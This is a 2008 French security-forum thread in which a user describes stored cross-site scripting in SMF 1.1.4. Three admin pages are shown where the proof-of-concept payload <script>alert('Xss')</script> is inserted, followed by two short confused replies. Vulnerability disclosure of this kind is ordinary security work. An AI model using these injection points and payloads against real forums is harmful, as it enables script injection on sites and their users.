Faille SMF 1.1.4 [par xss ! ]

Moderator: Mod

Faille SMF 1.1.4 [par xss ! ]

Postby xhunter » Thu May 15, 2008 9:37 pm

##############################################################################

XSS smf 1.1.4



Retrouve Xss a l'administration...

1----------------------

http://link/[path]/index.php?action=news
Modifie et renouvelle et insert :

<script>alert('Xss')</script>
enregistre ! pas de alert va etres regenerer dans chaque page !

2---------------------

va la : http://link/[path]/index.php?action=manageboards
cree un nouvrau forum et un nouveau titre:

<script>alert('Xss')</script>

resulta? XSS Clin d'oeil

3---------------------
http://link/[path]/index.php?action=membergroups;

Modifie ou cree un nouveau groupe et nomme le :

<script>alert('Xss')</script>

Clin d'oeil

tuto by xhunter
Last edited by xhunter on Wed Oct 15, 2008 8:32 pm, edited 1 time in total.
User avatar
xhunter
Projets
 
Posts: 44
Joined: Fri Dec 28, 2007 9:25 pm

Postby fyury » Fri May 16, 2008 7:41 am

Pas très bien compris de quoi tu parlais... .
Et pour aller plus vite tu peux faire <b>TESTxss</b>.

Donc si tu pouvais expliquer et faire une phrase lawl.
User avatar
fyury
Projets
 
Posts: 23
Joined: Mon Mar 24, 2008 2:35 pm
Location: pImgDosHeader->e_lfanew

Postby BLINGZ » Sun Sep 28, 2008 8:26 pm

Rien compris non plus :p
edit: en fait si
BLINGZ
Projets
 
Posts: 4
Joined: Sun Sep 28, 2008 7:14 pm


Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 2 guests

cron